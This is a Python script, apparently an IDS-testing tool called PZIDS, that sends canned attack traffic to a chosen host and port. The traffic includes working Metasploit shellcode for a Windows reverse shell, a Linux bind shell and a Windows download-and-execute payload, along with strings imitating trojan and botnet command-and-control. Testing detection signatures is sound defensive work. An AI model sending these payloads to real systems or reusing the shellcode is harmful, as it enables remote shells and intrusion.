#!/usr/bin/env python # PZIDS (Peta Zetas IDS) # # pzids is a tool to test if your IDS # is detecting threats properly. # # It includes some attack simulations # from the inside and the outside that # should match with your signatures. # # The name is taken from a well-known # candy commercialized in Spain. # # GNU/GPLv3 # a0rtega import sys import socket if (len(sys.argv) != 4): print "PZIDS (Peta Zetas IDS) Help" print "%s host port payload" % (sys.argv[0]) print "%s 127.0.0.1 80 1\n" % (sys.argv[0]) print "Payloads:\n" print "$EXTERNAL_NET any -> $HOME_NET any" print " 1 (Snort - SHELLCODE x86 NOOP)" print " 2 (Snort - SHELLCODE x86 setuid 0)" print " 3 (Snort - SHELLCODE x86 Windows 32-bit SEH get EIP technique)" print " 4 (Snort - SHELLCODE x86 Linux reverse connect shellcode)" print " 5 (Snort - SHELLCODE x86 inc ecx NOOP)" print " 6 (MSF - windows/shell_reverse_tcp)" print " 7 (MSF - linux/x86/shell_bind_tcp)" print " 8 (MSF - windows/download_exec)" print "\n", print "$HOME_NET any -> $EXTERNAL_NET any" print " a (Snort - ATTACK-RESPONSES directory listing)" print " b (Snort - SPYWARE-PUT Keylogger ardamax keylogger runtime detection - ftp)" print " c (Snort - BACKDOOR bandook 1.0 runtime detection)" print " d (Emerging-threats - ET TROJAN IMDDOS Botnet User-Agent STORMDDOS)" print " e (Emerging-threats - ET TROJAN Gh0st Trojan CnC)" print " f (Emerging-threats - ET TROJAN NgrBot IRC CnC Channel Join)" print " g (Emerging-threats - ET TROJAN Zeus/EyeStye Communication 0)" sys.exit(0) # From outside signatures snort_shell_x86_noop = '\x90'*100 snort_shell_x86_setuid = "\xB0\x17\xCD\x80" snort_shell_x86_win_seh_eip = "VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36FFFFTXVj0PPTUPPa301089" snort_shell_x86_linux_reverse = "\x31\xDB\x53\x43\x53\x6A\x02\x6A\x66\x58\x89\xE1\xCD\x80" snort_shell_x86_inc_ecx_noop = 'A'*100 ''' * windows/shell_reverse_tcp - 314 bytes * http://www.metasploit.com * VERBOSE=false, LHOST=2.2.2.2, LPORT=666, * ReverseConnectRetries=5, EXITFUNC=process, * InitialAutoRunScript=, AutoRunScript= ''' msf_shell_reverse_tcp = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" \ "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" \ "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2" \ "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" \ "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" \ "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" \ "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" \ "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" \ "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" \ "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68" \ "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01" \ "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50" \ "\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7" \ "\x68\x02\x02\x02\x02\x68\x02\x00\x02\x9a\x89\xe6\x6a\x10\x56" \ "\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3" \ "\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24" \ "\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56" \ "\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89" \ "\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0" \ "\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80" \ "\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" ''' * linux/x86/shell_bind_tcp - 78 bytes * http://www.metasploit.com * VERBOSE=false, LPORT=4444, RHOST=, PrependSetresuid=false, * PrependSetreuid=false, PrependSetuid=false, * PrependChrootBreak=false, AppendExit=false, * InitialAutoRunScript=, AutoRunScript= ''' msf_shell_bind_tcp = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80" \ "\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a" \ "\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0" \ "\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f" \ "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0" \ "\x0b\xcd\x80" ''' * windows/download_exec - 359 bytes * http://www.metasploit.com * VERBOSE=false, URL=http://example.com/ ''' msf_down_exec = "\xeb\x10\x5a\x4a\x33\xc9\x66\xb9\x3c\x01\x80\x34\x0a\x99\xe2" \ "\xfa\xeb\x05\xe8\xeb\xff\xff\xff\x70\x4c\x99\x99\x99\xc3\xfd" \ "\x38\xa9\x99\x99\x99\x12\xd9\x95\x12\xe9\x85\x34\x12\xd9\x91" \ "\x12\x41\x12\xea\xa5\x12\xed\x87\xe1\x9a\x6a\x12\xe7\xb9\x9a" \ "\x62\x12\xd7\x8d\xaa\x74\xcf\xce\xc8\x12\xa6\x9a\x62\x12\x6b" \ "\xf3\x97\xc0\x6a\x3f\xed\x91\xc0\xc6\x1a\x5e\x9d\xdc\x7b\x70" \ "\xc0\xc6\xc7\x12\x54\x12\xdf\xbd\x9a\x5a\x48\x78\x9a\x58\xaa" \ "\x50\xff\x12\x91\x12\xdf\x85\x9a\x5a\x58\x78\x9b\x9a\x58\x12" \ "\x99\x9a\x5a\x12\x63\x12\x6e\x1a\x5f\x97\x12\x49\xf3\x9d\xc0" \ "\x71\xc9\x99\x99\x99\x1a\x5f\x94\xcb\xcf\x66\xce\x65\xc3\x12" \ "\x41\xf3\x98\xc0\x71\xa4\x99\x99\x99\x1a\x5f\x8a\xcf\xdf\x19" \ "\xa7\x19\xec\x63\x19\xaf\x19\xc7\x1a\x75\xb9\x12\x45\xf3\xb9" \ "\xca\x66\xce\x75\x5e\x9d\x9a\xc5\xf8\xb7\xfc\x5e\xdd\x9a\x9d" \ "\xe1\xfc\x99\x99\xaa\x59\xc9\xc9\xca\xcf\xc9\x66\xce\x65\x12" \ "\x45\xc9\xca\x66\xce\x69\xc9\x66\xce\x6d\xaa\x59\x35\x1c\x59" \ "\xec\x60\xc8\xcb\xcf\xca\x66\x4b\xc3\xc0\x32\x7b\x77\xaa\x59" \ "\x5a\x71\xbf\x66\x66\x66\xde\xfc\xed\xc9\xeb\xf6\xfa\xd8\xfd" \ "\xfd\xeb\xfc\xea\xea\x99\xde\xfc\xed\xca\xe0\xea\xed\xfc\xf4" \ "\xdd\xf0\xeb\xfc\xfa\xed\xf6\xeb\xe0\xd8\x99\xce\xf0\xf7\xdc" \ "\xe1\xfc\xfa\x99\xdc\xe1\xf0\xed\xcd\xf1\xeb\xfc\xf8\xfd\x99" \ "\xd5\xf6\xf8\xfd\xd5\xf0\xfb\xeb\xf8\xeb\xe0\xd8\x99\xec\xeb" \ "\xf5\xf4\xf6\xf7\x99\xcc\xcb\xd5\xdd\xf6\xee\xf7\xf5\xf6\xf8" \ "\xfd\xcd\xf6\xdf\xf0\xf5\xfc\xd8\x99\x68\x74\x74\x70\x3a\x2f" \ "\x2f\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63\x6f\x6d\x2f\x80" # To outside signatures snort_att_resp_dir_list = "Volume Serial Number" snort_spy_keylogg_ardamax = "{D082139B-D5E4-4e63-B866-9BFC97880A48}" snort_back_bandook = "&first& " et_trojan_imddos = "GET / HTTP/1.1\x0D\x0AHost: randomhost:1234\x0D\x0AConnection: keep-alive\x0D\x0A" \ "User-Agent: STORMDDOS\x0D\x0A\x0D\x0A" et_trojan_gh0st = "Gh0st" et_trojan_ngrbot = "PASS ngrBot" et_trojan_zeus_eyestye = "AAAAA\xB4\xB4\xB4\xB4\xBC\xBF\xBF\xBF\xBF\xBD\xBD\xBD\xBD\xB3\xB3\xB3\xB3" # Run host = sys.argv[1] port = sys.argv[2] payload = sys.argv[3] if payload == "1": buff = snort_shell_x86_noop elif payload == "2": buff = snort_shell_x86_setuid elif payload == "3": buff = snort_shell_x86_win_seh_eip elif payload == "4": buff = snort_shell_x86_linux_reverse elif payload == "5": buff = snort_shell_x86_inc_ecx_noop elif payload == "6": buff = msf_shell_reverse_tcp elif payload == "7": buff = msf_shell_bind_tcp elif payload == "8": buff = msf_down_exec elif payload == "a": buff = snort_att_resp_dir_list elif payload == "b": buff = snort_spy_keylogg_ardamax elif payload == "c": buff = snort_back_bandook elif payload == "d": buff = et_trojan_imddos elif payload == "e": buff = et_trojan_gh0st elif payload == "f": buff = et_trojan_ngrbot elif payload == "g": buff = et_trojan_zeus_eyestye else: print "Error: Unknown payload." sys.exit(1) try: print "Connecting ..." s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, int(port))) print "Sending payload ..." s.send(buff) s.close() print "Sent!" except: print "Error: Unable to connect to %s:%s" % (host, port) sys.exit(1)